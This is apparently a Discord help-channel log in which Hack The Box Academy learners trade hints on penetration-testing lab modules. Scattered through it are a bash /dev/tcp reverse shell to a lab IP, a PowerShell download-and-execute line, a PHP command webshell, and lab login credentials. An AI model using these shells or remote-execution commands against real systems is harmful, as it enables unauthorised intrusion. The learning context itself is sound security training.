#modules
n00b question: in the Web Requests -> POST module, I'm struggling a little bit with completing the exercise. The prompt is "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' ", which I've done as far as I can tell but am not seeing the flag. As far as I can see the command works (and I can query on cities and get a result), but if I look for 'flag' (or variants) or any obvious flag segments (e.g., '{"search":"HTB"}') I get nothing back (same response as if I search for a nonsense term, which I take to mean that there are no matches to my query in the database). Do I need to do something to get the flag inserted in that database for me to pull out (as in the API section that follows?)
I'm trying to access rdp and have this issue, does somebody know how to solve it?
I am just trying to recreate what is in the instructions in this module before i try going for the flag but im doing the exact same thing but not getting the same results
like i have the dtd file, and have the code the same but its not grabbing the information
i tried finding the flag the other way suggested in the module but got no dice
Hi guys I leave my contribution since it cost me a little to do it and I want to share it module || Bash scripting || question --> Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints the number of characters of the 35th value generated from the variable "var". Send the number as a response.
You have a typo in the IP address
Thank you, however, sharing solutions to modules that are not tier 0 is not allowed
I will keep this in mind for the next one
@vivid igloo Thanks! It works. I only need to be patient. Shell doesn't open immediately. Need to wait a little while to receive the reverse shell. That was the initial problem.
still getting same result ugggg :(
Hello who can i contact about having VPN problems and its not connecting. Thanks
Need some help? Learn how to reach the support team on Academy.
ducking shit the last question was mean ... hate you all 
is anyone's burp suite > open browser taking an extremely long time to load the machine target's IP?
fixed. went to normal firefox browser and it seemed to work fine through that.
are you getting a host error
No, I'm getting nothing. It just loads.
I'm using pwnbox as well.
Windows file transfer methods!!
Hey everyone, I have a couple questions about this module, I have finished all exercises and understand everything, it's pretty straight forward.
With that being said, I wanted to practice a little more at the end and decided to go through some of the power shell examples and also the SMB upload example. None of the methods described from the course work are working properly. I am getting a ton of powershell errors when trying the SMB upload methods, along with the powershell web uploads. I have tried the suggested powershell "error" fixes in the course work but that didn't do anything. Has anyone experienced the same issue?
whats the actual commands you're using
send screenshots of the errors and what not
The command I used is directly from the course -> PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Can someone please help me out with the last bit of the DNS module, im trying to find out "What is the FQDN of the last octet that ends with x.x.x.203"
The hint is "Remember that different wordlists do not always have the same entries." and i have tried a load of other wordlists but nothing is getting me the answer
I have tried all the ones in Seclists/DNS/ directory
Using dnsenum right?
yup thats the one
Also you can brute force sub domains found in DIG -AXFR zone transfer
Have you checked those out?
I think i get what you mean
I believe I have done that
and stumbled across in*****l.inlanefreight.htb
try ones like dev.inlanefreight.htb
okay ill try that
Look at some of the discussions like this -> https://forum.hackthebox.com/t/what-is-the-fqdn-of-the-host-where-the-last-octet-ends-with-x-x-x-203/268809 I dont want to give you the answer but many forums like this will help with hints.
I need help in attacking common services module in sql databases section can someone tip me does the password is in some of the databases available
I stuck in this section
No problem! that was a bit too tricky. Glad to help, I remember it gave me issues as well
||responder|| is your friend
am doing Linux Local Privilege Escalation - Skills Assessment and i have Meterpreter 2)(/root) > and i am totally lost where to find first flag
First question?
Submit the contents of flag1.txt
yes yes
which dir should i dig in
Log in with the given creds via SSH and use ||find||
This was part of the first section. You can use find, locate, or grep to locate the flag
for the last couple of days, when i try to xfreerdp to a machine i get a black screen and an error stating 'certificate verification failure'. i've restarted the box, ive restarted my machine, but no luck. any ideas? command i run is xfreerdp /v:10.129.157.96 /u:'htb-student' /p:'Academy_student_AD!'
xfree was working fine up until yesterday
it is actually messed up
none works
neither grep nor find
gotcha, so just need to wait for HTB to fix it?
i used it already with the user htb-student
try it like that
xfreerdp /v:10.129.157.96 /u:'htb-student' /p:'Academy_student_AD!' /cert-ignore /tls-seclevel:0 /timeout:80000
Try "locate flag.txt"
find works
thank you, will try
It's not flag1.txt
I can't understand what should i do
still no luck : find / -name "flag.txt" 2>/dev/null
htb-student@nix03:~$
read the post from jp3g
whats the commands that u used ?
find
why it's not giving me the flag then
because your command is incorrect
?
jp3g has told you that the file is not called flag1.txt.
Try it with wildcards
Submit the contents of flag1.txt
?
For some reason I cannot reach the vHosts:
vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local
this is in the active infrastructure identification.
the target IP provides info on dig/ns/whatweb etc, but those two vHosts give me nothin but cant resolve.
did you list them in the hosts file?
Correctly recognized, it is about the name resolution.
where was the hosts file again? etc/avahi/hosts?
Use wildcards to find the file.
Linux: /etc/hosts
Windows: depends on the version
I got stuck on this
Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?
I used mimikatz to dump the TGT, and submit the number of TGT, and it is incorrect..
@acoustic owl what to do with responder
Better get back to the section content and read the following to have a better grasp on what to do with responder
How many users TGT did you collect?
oic, thanks
someone got dehashed to work?
The git repositories I installed don't work
Hi everyone! Do you know how I can recover a file while connected to another with evilwinrm?
You do not need this tool for this task
could u give me a hint?
am trying to get the mail for Charles Smithson
In the module you will find creds to log in. Try it with this
I tried that
maybe I needed to write the password manually
In the password attack module the lab_hard i found a logins.kdbx file, and just want to know if i do things properly. I convert the file with keepass2john and then i use the mutated password file to crack the file
got it now ty
If you have done everything correctly, cracking the password should take less than 5 minutes.
oh my my. now I cannot find inlanefreight.htb on active subdomain enumeration.
tried nslookup:
nslookup -query=A inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN
used Dig and got:
dig any inlanefreight.htb
; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> any inlanefreight.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14448
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;inlanefreight.htb. IN ANY
tried adding the target ip in etc/hosts with inlanefreight.htb as the name.
u need to mount the vhd
i used evilwinrm to dowload the file, That's the only thing I'm not sure about.
to transfer the file ?
nvm u will know when u have to do that
i thought u was ahead mb
u just have to crack the password
and open the file
And again DNS: htb is not an official TLD. The public resolver cannot resolve this domain.
is it normal that the hash is different when i download the file with winrm ?
Hi! I'm stuck in the getting started module, in the knowledge check section. It's a Getsimple CMS app (I already know the version too) and I have the administrator credentials, but I want to upload a shell file but the upload file button isnt working (because of flash player). Any help?
yeah figured adding this one to etc/hosts would fix that, but it doesn't work. Tried looking for the NS. it no work either.
DNS strikes again
No, that can't work.
To resolve a domain that does not have an official TLD, you must ask the authoritative server directly.
not sure but i think it shouldn't
i just transferred the file with smbserver
ah so it would be like: dig any inlanefreight @ip addr
Hi, I am doing Windows Fundamental Module. One of the question was asked ( What is the name of the service associated with Windows Update? ). Does anyone know what is the service associated ? I tried google but failed.
Exactly
Take a look at the process of a DNS query.
Client asks resolver.
Resolver asks root name server who is responsible for the TLD.
If you now request a TLD like htb, the root name server does not know who is responsible. It does not know this TLD.
makes good sense I would say
lmao just see this twitch live from OffSec
kinda familiar with this, where have I seen this before?
so you have created a smbserver with impacket in your machine and transferred the file from the remote machine to the smbserver ?
You can record such a query with Wireshark on a resolver and then look at exactly what happens
Shoot lets do it im going to run one right now
it is hard to do that imo, text always more detail than video, and video makes you slower the progress to learn from my experience...
Nobody?
After all, the lessons are structured in such a way that the module teaches you the knowledge, but then you have to apply the knowledge you have learned and not just copy and apply commands.
With a video, exactly this concept would be lost.
is it just not showing you anything when you press the button? have you tried navigating to the index page, looking for uploads, and checking if it was uploaded without giving you any feedback?
Yes, and there is no way of upload a file
Try it with ||metasploit||
I will try some scripts of metasploit db, but I want to do the manual way
metasploit works as I remember, I did it a few days ago
What should the video show you that the text does not?
What is this script?
A module is not installed on your machine
pip is from python 3
For your Script you use python 2
If you want to watch video, check out ippsec's videos. He explains his procedure in his videos.
last question : Should i have to use the mut_password list to crack the keepass file ?
Look at the output, then you know what was done.
I have marked the places in yellow
Note: pip 21.0, in January 2021, removed Python 2 support, per pip's Python 2 support policy. Please migrate to Python 3.
@acoustic owl Ty i found the keepass but now when i try to log in smb i can't
AFAIK - Pip was just symlinked to the operating systems default python version. Not necessarily python2.
ok tq
im doing web proxies skill assesment and doing lucky.php
im trying this
ive sent it like 30 times
but i never get the flag...
Few things here. It looks like you've combined a GET and POST, and you have a / after your php target.
also also its rng so you could theoretically do it like a 1000 times and be unlucky and never get it lul
personally id cheat and use ffuf but pipe it through burp to capture the requests, filter out by size and then kick back and wait for the flag
i've put POST and did php?gf=true
but nothing lol
i've also added an HTB match when i get flag
but shi
its the only flag ion have lol
Why u did this ?
You have combined a GET and POST request ?
If you want to send a POST request delete parameters getXXX=true after / and write it in the end of the request
it sounds so strangely
Anybody done the Firewall and IDS/IPS Evasion - Easy, Medium and Hard Labs within the Network Enumeration with Nmap module - Struggling to get the right nmap switches, so was wondering if someone could clarify the evasion tactics?
Cheers!
Hi all. I am having trouble with void challenge lab on HTB. Can you help me the walkthrough for this lab. Thank you very much
Better ask in channel #challenges
I don't have permission to access this channel. How can i access it?
use ur api
to identify in the discord
Module: File Inclusion
Section: PHP Filters
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
I think this question may be worded poorly. The module talks about fuzzing directly off of ip:8080/FUZZ
but- theres nothing there
can anyone give me a nudge on this
I suspect what they actually want you to do is fuzz the LFI location, which the module does not cover
Read #welcome
for other PHP scripts ?
/FUZZ.php ?
Hello folks. I finished the MSSQL part of the Footprinting module. But I can't make the suggested nmap scripts to work. The nmap MSSQL scripts seems to be broken. I even updated nmap and still not working. I try to do something similar in my own Kali box (was using PWn box) and still does not work.
I try to not use metasploit too much and rely on nmap when I can, hence my interest in knowing what's wrong.
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2019
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
|_ms-sql-empty-password: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dac: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dump-hashes: ERROR: Script execution failed (use -d to debug)
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
|_ms-sql-xp-cmdshell: ERROR: Script execution failed (use -d to debug)
I get all these "debug" errors
try clear update of nmap
i was just checking online and lots of people were having issues due to older version
suggest removing it and doing a clean install of nmap
also upgrade the OS
You are the man! Thanks @iron plaza . Removing, Updating Os, then reinstall, fixed my problem. I was just updating nmap.
Can I dm someone about the Attacking Common Services Easy lab, I am at the last step but I keep getting errors?
Attacking Common Applications - Thick client applications
Do I need procmon?
I am able to upload the shell via sql but I am stuck at a white screen when navigating to it.
You can Dm me
OSINT: Corporate Recon
Question: Which version of WordPress is used on the Inlanefreight domain page? - Technologies in Use
I believe this question is broken.
I have had no trouble with the tricks in this module, and i dont think this one is a trick.
@rustic sage
If someone has the answer to OSINT: Corporate Recon Wordpress version, may I dm you please?
Ive now completed everything but this question. Would really appreciate the help.
Yes
press enter
DM, if you still need help
This can be solved with enter. But another problem is with some windows boxes explorer will keep closing automatically every few minutes. It's extremely annoying.
Yeah some boxes are a real mess unfortunately.
I do everything but i don't have permissions to do this
This section is so dumb and unreal
Could you be more specific for "I don't have permissions to do this"? What permissions you don't have?
I'm going to message you in private
?
Ok
anybody, please? 
Active Directory Enumeration & Attacks
Bleeding Edge Vulnerabilities
Print Nightmare vuln
I've started the listener
I've hosted the DLL
When i attempt to execute the exploit
It auths to the SMB server just fine - but I get an error of ERROR_FILE_NOT_FOUND - without any real description as to what file.
Any help appreciated
And of course - After hours of smashing my head I work it out within 5 seconds of posting to discord >.< hahaha
Could I get a sanity check on the first skills assessment for "Active Directory enumeration and attacks" for the question that asks me to find a users clear text password? Using blo** hou** I figured out the user, and the attack they can perform but I'm unable to find the clear text password. I used snaffler to search but it's come back empty. Am I on the right path to be looking for plain text files?
Also search for all shares and they came back with nothing useful
Been manually searching as well but that's not doing good either
Hi need help with this tiny thing:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
based on my understanding of FQDN I can't find the ans that the box accept
The FQDN of the NameServer is searched for
mind if I bother you in DM ?
NP, send me a DM
hello everybody
i tried to ping app.inflanefreight.local but its not working and i added the host to vi etc file. still not working
does sb know why?
10.10.15.159
In which file did you enter the Host and IP?
vi etc/host
vi is the editor and not the file
etc/ or /etc/?
/etc/host or /etc/hosts?
I just want to make sure you made the entry in the right place
etc/host = relative path so if there is an etc folder in ur current directory then it will edit there. /etc/host is the absolute path which points to the correct file
i added etc/host still isnt workin
can you just cd /etc/ and then ls and show us if the hosts file is there.
Then cat the hosts file to show us what's inside it
I'm not sure if you accidentally made duplicates, deleted the file, overwrite it or what, but just do that to be sure
issue should be resolved, OP misspelled inlane as inflane
this is why i always ask for screenshots
?
is bro deleting his own messages

nvm.. yes i am.
u solved it?
yes... i forgot to also add the domain name to the hosts file in addition to the dc name
just got it to work
i like when i can resolve myself.. lol
its always when you ask for help, do you fix it urself
hello somebody know to express GiB in format:000?
hello somebody know about the last question about splunk module and intro section?
Can somebody help me with attacking dns section in attacking common services module
What does not work?
Dns zone transfer
I found subdomains and try on every of them
It gives me transfer failed
I also add ip and domain in /etc/hosts file also didn't work
There are zones that do not allow zonetransfer from anyone (depending on configuration)
The Hosts file is there to allow name resolution of individual hosts.
But you want to do a zone transfer. The Hosts file can't help you there.
Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.
What exactly is the Problem? You have to pretty much do exactly what is shown in the module
I cannot intercept the restart oracle service
with procmon
And it doesn't create the .bat file in cybervaca either
hello guys, sorry for bothering you but can I get a hint
https://discord.com/channels/473760315293696010/1122139635452215399
I'm stuck in module "ACTIVE DIRECTORY ENUMERATION & ATTACKS" part "Credentialed Enumeration - from Windows" the question is "What is the password for the database user?", what method should I use to find it?
What should i do
.
Try the ones you learned
In the section
Can I get some help on getting my shell to work in the Attacking Common Services Easy lab? I am very close but keep getting a white screen with sql, or an error with ftp.
Hi, I'm on "Getting Started" - public exploits. So I found exploit: scanner/http/wp_simple_backup_file_read
I've changed rhosts, rport and filepath as it should be, but when I run exploit I can't see that any file has been saved on my VM. Do anyone know why that might be?
Contact support via the site.
ok
Someone can help me please
Hi there
I need help if someone can help please dm
Hi @acoustic owl . Stuck on the Nessus skills assessment in the Vulnerability assessment module. Followed the instructions and my completed scan looks like this (see screenshot). Am I on the right track? I can't seem to answer any questions with the output provided. Any hints would be appreciated.
Can someone help me
what is the question you need help with?
I thought was correlated to any of the academy modules
Do you mind if we discuss this privately
Please
I sent a dm plz answer it
Some help please dm me
Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.
does anybody complete the section attacking dns in attacking common services module because i need help
Thanks, but which one I'm still stuck.
Hey,
I'm stuck on the BloodHound skills assessment, the last question,
Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).
I tried to follow the below link [0], and tried to issue the following query:
MATCH (totalUsers:User {domain:'INLANEFREIGHT.HTB'})
MATCH p=shortestPath((UsersWithPath:User {domain:'INLANEFREIGHT.HTB'})-[r*1..]->(g:Group {name:'<FAILD THIS????>'}))
WITH COUNT(DISTINCT(totalUsers)) as totalUsers, COUNT(DISTINCT(UsersWithPath)) as UsersWithPath
RETURN ROUND(100.0 * UsersWithPath / totalUsers * 100) / 100 AS percentUsersToGlobalAdmins
But I guess I failed FAILD THIS???? in the above query, can anyone help me or give me a hint?
thank you in advance
[0] https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
I have my webshell on the Attacking Common Services easy lab, but I am unable to turn it into a reverse shell. Can I get a nudge on this?
any reason im getting this error?
are you sure that user has access to DC01?
its for the protected files section on password attacks
what did you try so far?
looks like the install of ssh2john is broken there. if you can, try it on your own vm instead
I have tried: from the web shell, creating payload with msfvenom, and then trying to call the file from the webshell and catch it with a netcat listener. I have also tried using reverse shell generator, and uploading the code through the sql method but I am getting errors.
ok thanks will do
I can see the files uploaded to the target but I dont think I am calling them correctly
well calling would just be accessing the file similar to the webshell, no?
when I go to navigate to it, it just attempts to save the file to my attack host for some reason
umm what
well yeah it's an exe file. windows knows how to execute these, but the webserver doesn't
but since your webshell is working, you know a way to get the webserver to execute stuff
I have been trying other methods, but it doesn't seem to be working, it just hangs up... can I dm you the screenshot, I dont want to spoil it?
sure
@long grove please stop dming me questions and ask here. I am not accepting dms
you still need another set of credentials that you haven't found yet. bloodhound can help you out here
I stuck in password attack the assessment easy one
Examine the first target and submit the root password as the answer.
I am not sure whether this is right or not
sure thing
this won't work. try finding a foothold first and then go from there
how?
u dont find the root password first
u can get someone elses credentials first
there may be other users to go after with easier passwords
idk if thats tmi
Not tmi. :)
I only know root as user
Then maybe you need to look for other users
indeed, but that shouldn't stop you
PM?
Anyone have any hint or clue as to how to find the flag in the Containers section in the Linux Privilege Escalation module? I was able to elevate my privileges to root as the section shows, but I've looked everywhere for a flag.txt file and I can't seem to find it anywhere.
could it be a permission problem?
ive restarted the box new ip new everything and im getting the same response
Never mind. I found it.
Use the resources from the module
I'll test in a minute but I'm pretty sure it should work the way you did it
I tested it and I ran into the same issue. not sure what the problem is tho
any chance you know who to tag for pwnbox fixes? figured out what the problem is but dunno who could fix it
to fix it, replace decodestring with decodebytes. decodestring has been removed in python 3.9
Use python 2.7
that works too I guess
Ssh2john has not been updated to python 3.x so you need to either update the code manually or install python 2.7.x and use that
¯\_(ツ)_/¯
i really appreciate you going out of ur way to help me
thanks mate
well the kali ssh2john is fixed
it uses b64decode instead
it worked
Hello I have the problem with Linux Privilege Escalation at section Logrotate
stuck at Waiting for rotating access.log...
the command i using: ./logrotten -p ./payload /home/htb-student/backups/access.log
I also tried to add some short content to access.log, and i saw there is new access.log.1,2,3,4,5.... But There is nothing return to netcat that I open for listener
here is the payload i using: /bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1
need help!
thanks
sure thing
Took me a long time to complete this.
Thanks to goat @acoustic owl for helping me along the way
congrats
Could I get a hand with attacking common services - hard? ||I can't login to the SQL server as F outside of the management studio, I get errors using sqsh, mssqlclient & sqlcmd! Am I missing something?||
is this a common thing and how would i know if thats the problem just for future reference
Attacking common applications -- both sections of attacking thick applications. I am not able to complete them, I have been trying it since yesterday.
just one more section and I'll be in the same boat
I am just missing that two sections to complete the module
but it is not really well explained
Which question
login bruteforcing
skills assessment service login
brute force ssh server
I am using username-anarchy to generate the username list, and I used cupp with just the first and last name of the user. added numbers at the end and also special characters.
I cant get anything to hit. Can someone give me a nudge
impersonating j*** Once logged in, what other user can we compromise to gain admin privileges?
you are doing hard right? There are 4 questions.. which one are you doing right now?
I'm trying to compromise the user
@gusty zinc you need to include almost no information in cupp for that user. start with the bare minimum & then use the password policy
Do you have F** creds?
yes
try for mssql with those creds
I did, I get errors
Which section?
you have to share what have you done so far and the question you stuck on. otherwise it will be hard for others to help you
whats your command?
just as I thought
there is 2 kinds of login, domain login and local login .
just completed using that - and got no hits
1 of 1 target completed, 0 valid password found
cupp just first and last name - added special characters and numbers
then used sed to do the password policy
if you did first name last name only then the cupp should be fine
do you want to add spec characters at the end of words?
yeah
something isnt right
its not working
my wordlist ends up being 77 passwords
ran again with no hit
If someone has completed those and could help me please
Does anyone have any clues on how to get the logrotten tool to work in the Logrotate section in Linux Privilege Escalation? I'm running into issues with this section and getting the tool to work. I managed to transfer it to the vulnerable linux box but I can't seem to get it to give me a reverse shell.
it takes some time
try to open two terminals of the ssh
and then spin the logrotten and then try to echo hi >> access.log in other ssh terminal
ayo
am stuck with this one question in skill assesment Submit the contents of flag1.txt
Linux Local Privilege Escalation - Skills Assessment
just tell me one this is the flag is called flag1.txt
or flag.txt
because i tried all wildcards with find and still got none
@acoustic owl
by getting the right privileges
i already have root privileges and i already got all the flags
afaik kira doesnt have sudo privileges
can i get a hint lol
wdym ?
how do u get the right privileges
Neither.
Remember that a flag can be hidden.
it's really embarrassing that i asked such question instead of focusing lol
No, it's not embarrassing and hey, it'll never happen to you again
yes sir more focused from now on
is this the only way to do it?
no as in sudo exploit?
use the tool we always use to exploit windows 7
u can run the exploit straight if thats whatchu asking
Okay, I'll give that a shot.

im still lost how are people getting the notes.zip file in the protected archives section
which module are u talking about ?
password attacks
sorry never even touched that module
i was gonna say theres no way it was a msf exploit
appreciate u trying to help tho lol
can anyone help lol
hi guys im almost finished learning the intro linux course
once i finish that what else do i need 2 learn so i can start hacking people
i am stupid nvm
"Which shell is specified for the htb-student user? "
wat is this question asking
mean like bash?
"Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"
both ips are wrong?
https://academy.hackthebox.com/module/158/section/1428
the second one is close but not quite the answer
how would i go about getting the answer? there is no other route in the autoroutes list
if I'm not mistaken there is another equivalent representation for that subnet. take a look at the netmask, maybe you can make sense of what I mean
@heady tusk did u get complete thick applications?
ah well this is gonna be fun then xD
alright then, shellshock done, now on to the fun part lol
The Miscellaneous Techniques section in Linux Privilege Escalation isn't making any sense. It doesn't give an explanation on how to follow the steps in order to get the flag because it doesn't allow you to remote into the htb@NIX02 box and carry out the commands. Has anyone done this section and could give a hint on what exactly is needed here?
I solved the Attacking Common Applications Easy lab, but I don't think I did it either of the intended ways. Can I dm someone to see if I did it correctly?
if it worked, it was correct. š
There is no right or wrong in hacking
But send me a dm, then I can show you my way
Anyone confused with the Capabilities section of Linux Privilege Escalation? It says the binary has cap_sys_admin, but it doesn't in the example. I feel like I'm missing something crucial here.
this cant be right can it
its not unusual for labs to take a twist on the taught material and unintended paths are pretty rare, so most likely you did intended way
it can be, that whole module is a pita
if you did everything correctly go watch a tv show or something for 20ish minutes and come back
which is why I hate that module
lol ok
dont know if you did something wrong till after youve wasted like half an hour
yeah bit of a piss take i agree
I'm still not understanding what to do in the Miscellaneous Techniques section in Linux Privilege Escalation. Can anyone give me some assistance with understanding what is needed here? It just isn't making any sense.
Never mind. I figure it out.
Whats like the sweet spot for threads in hydra?
highly depends on the service you're bruteforcing. it'll usually tell you how much it recommends for the service it's running against
Hey people, I'm writing here cause I'm pretty desperate for some hints at this point, I've spent much more time than I would like to admit on the "Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
The closest I've got was using msfconsole and an exploit named wp_admin_shell_upload as suggested in one of the previous sections of the module, but every time i try to execute the run command it actually won't upload the payload and just crashes for some reason I really can't figure it out, would anyone help please?
you can do it manually.
As described in the module, edit the page 404
Unfortunately that is incorrect, if I try to do it manually when I click the button "update" on the theme, it says that the code can't be updated that way and I have to use ftp to edit the files
Finally got it https://academy.hackthebox.com/module/113/section/2139
ty for the help @heady tusk
Hello i keep getting sub failed for academy when i have enough fund to sub. help anyone?
You might want to contact HTB support for that one. This place is more for community help with modules rather than platform issues.
Thanks a lot have a nice day mate
In Active Directory Enumeration & Attacks, for skills assessment part II, I wasn't able to import the powerview module. Ive tried a few different methods but been unsuccessful. Is this intentional or do I just need to try harder? I feel like I need it to get the second user but maybe im just not living off the land enough
You add 2 | symbols next to each other at the start and end of the text u want to mask
I think the server decides what emojis are allowed? I'm not sure lol
Btw were u able to get power view to work on ms01?
I'm on same section as u
Which emoticon are u trying to use? I could see if it works for me
Yep works for me
Hold down on the message ?
Hm ok I'm missing admin creds then
I was thinking it had antivirus or something lol
Well I used the first user a**** creds and it didn't let me run powershell as admin
Maybe I mistyped something in the pop up. I've been up too long without sleep
U don't have this?
Not there yet lol 🤧 I just got managed to get the password for the b*** user
I'm eating breakfast rn but I will come back in like 30 minutes
so you have pwn the DC01 and got the Administrator user hash but you are having issue logging in with that hash?
i think i have a typo in my note so give me a sec i'll double check some stuff and send you a dm
Does anyone have the same problem with machines in Windows Privilege Escalation Skills Assessment? I cant connect to them with vpn or pwn box. Machines in other parts of this module are working
In Attack common service - RDP Connect to admin machine using rdp in hint I know should use another way to log in without username and passwords so in ||registry editor I set Limit blank password to 0 but still accept password to log in || Can I find another way to log in or something wrong in my road?
if you are on the first Skills Assessment then there should be a ||website|| running on the target machine and if you are having trouble connecting even on the pwnbox then check and make sure you don't have both your vpn and the pwnbox on at the same time
if you are trying to login with the ||hash|| then you are on the right path no idea about that error but it could be because of the ||DisableRestrictedAdmin|| thing
Hello! Not sure if this is the best place to ask. I am doing the Getting Started module and I'm down to "Nibbles - Privilege Escalation". Up until this point I was able to get a reverse shell, but all of a sudden it started timing out. Whenever I access the image.php it just loads and times out. Does anyone know why? I was so close to getting the root flag and I'm stuck for a few hours on this. I've reset the target a few times but with the same result.
if you can still access the target web site and you are following the previous section to get a shell you can just try to upload a different image
I did but I am not receiving anything in my netcat listener
screenshots pls
whats in image.php
and if your shell keep dying try to get a better shell like a meterpreter shell
the previous setup show how you can get a shell with a images that have a payload
in this case reset your target and try again
I am using the reverse shell from pentestmonkey and I changed the ip and port.
this can be the case 🤣
Does anyone know how i can find this?
I have reset it several times, it's not expired.
can you curl the webpage
Look where mails are normally stored.
I tried curl and it doesn't show anything in netcat
motherfucker
no, just a normal curl get request to whatever page, does it show anything at all?
oi chill
and try to ask better question next time

"How do I earn money?" Go to where money is usually stored bro
you can just google where is mail stored in linux
or you can google it
People who want help but then insult those who try to help, those are the ones I like best
Do you mean something like this?
http://dontasktoask.com/ which module and section you in? what is the question you are having issue with? and what did you try?
if your target are still running fine just upload a different payload and try again if you still get nothing try reset your target and use a different payload if the pentest monkey payload keep giving you issue
seems like the web page is responding.
You can upload a more simpler payload to add to what MRtom suggests.
I already did this. I tried with different reverse shells, I reset the target 3 times, same issue every time. I also tried with msfconsole to run the exploit and it says I need to manually adjust the image.php.
so your issue is the shell die after a few sec of you getting one right?
That's one way to never get help again
@tulip jasper and by getting a meterpreter shell i don't mean using any exploit but i mean use the web delivery to get a shell
That's a shame. I wish there were other forums where help can be accessed
I have overthinking about this question to learn more -how can dump hash or pass the hash if I can't access on system32/config/sam and no port open to move file and using PtH all of this give me access deny all it make me to thinking more … but I think should I dig more
The issue is that when I access the image.php, my netcat doesn't detect anything. It was working fine this morning. I was following the steps in the module.
the solution is a bit too obvious so i can't give you any hint here so i'll send you a dm in a bit
i found this but there is nothing else there
I'm not even kidding when i say, you can google this online and there's htb academy forum threads where people can help you, or have come across the same problem before.
from this screenshot the error that the payload is given is a timed out error so it can't connect back to your nc listener so maybe double check your ip and port on the payload or use this payload to get RCE not shell: <?php system($_REQUEST['cmd']); ?>
I have no idea why you are being like this my guy.
How unfortunate
yeah i'd suggest a more simpler rev shell if a large one like pentestmonkey doesnt work
Hey there, anyone with some hints on this please: #modules message
https://forum.hackthebox.com/t/what-is-the-path-to-the-htb-students-mail/3793
please, next time don't get so mad (and toxic)
and for real try to ask better question next time if you want any help
I know, but my question is more to do with something else. The path to the mail is found in /var/mail. But didn't they specify that they wanted the mail belonging to the htb-student? It seems there are 3 user accounts on the computer, cry0l1t3 htb-student mrb3n. So how do we know who the mail belongs to in /var/mail since no user is specified
if that makes sense
did you read the post i sent you
1sec
i mean to me the simplest payload is the one that give you RCE so if it work it work and there is no error to be debug or finding what went wrong and the next best thing is a python shell but putting that in to a php payload is going to make that not so simple any more
yeah ur not wrong
Usually if a large rev shell doesnt work, i simplify it.
Sometimes it's a lag thing due to academy being 300 ping for me XD
Really difficult to follow the replies. They get buried fast. So it seems this is working fine. Trying to retrace the steps from "Nibbles - Initial Foothold", where it was working fine.
So smaller, simpler payloads help
yeah probably the payload is too big and takes too long to upload or whatever is going on behind the scenes.
You can use this to send a rev shell. (or whatever is the next step)
that will also work but if you use the CMD thing you will have full RCE with ?cmd=id to run the id command that you just run
Initially I was using the one liner from the module. But that stopped working and then I tried the one from pentestmonkey
for php though the simplest shell for me is the rce shell that you are using and the one i just send you but for other rev shell if you don't already know you can use https://www.revshells.com/
It just stays like this..sometimes I get a timeout error in the browser ..what is wrong in there? I used that for "Nibbles - Initial Foothold" and I was able to get the flag and now it's not working anymore.
Update: ignore the arrow from the 23 for the image.php size. I am actually using port 23. Just a coincidence there.
Also, the target is not expired.
Hi,
Could someone help me for the "Network Service" section of the "Password Attack" module on HTB Academy. I've been stuck on it for a while.
Thanks in advance
What exactly is not working?
sorry for the wait but i just give that a try and that payload doesn't seem to work
That is weird. It's the payload from the module and I used it to get the first flag.
I can't connect for SMB and RDP users, I'm not sure I have the correct username and password
but the python3 #2 shell on revshells seem to be working for me (my favourite shell)
could be url encoding
I also advise to use the bash -c 'bash -i' type of reverse shell.
it's just more stable and works more often in my case.
the other shell loaded fine on firefox no idea why that didn't get auto url encode
try manually encoding then i guess
you can just go to a url encoder and url encode it from there
but the first pic wasn't url encoded
Send me a DM with the creds and we'll look at it together.
ippsec favourite shell doesn't seem to work 🤣
bash -c 'bash -i >& /dev/tcp/<IP>/<Port> 0>&1'
thank you, I will try it
yeah this didn't work me
do url encode it
even while url encoded?
well use python in that case, since it seems like it worked
i might redo the module later to test
could you please share the python version if that worked for you ?
yep
it's on https://revshells.com/
the python3 #2 one
thank you!
Hey, has anyone reading this completed the "Hacking Wordpress" module?
sorry buddy ik u been posting here quite a lot, but i don't have the module to help you
Yes
@rare topaz the weird thing is in firefox for a php RCE payload if something loaded it's will be auto url encode and in the case of my python payload it's loaded and worked so it get auto url code but for the other bash and nc payload it doesn't loaded but didn't work but it both doesn't hang and didn't get url encoded
might be the &
i think this is one of the first time i saw firefox do something like or maybe the firefox version of the pwnbox is different
in the shell? it could be
No worries, I don't expect to get help necessarily, I just try my chances since I really can't figure things out 
which is why i'll test it out
well yep you are right encode all special chars work, nice catch
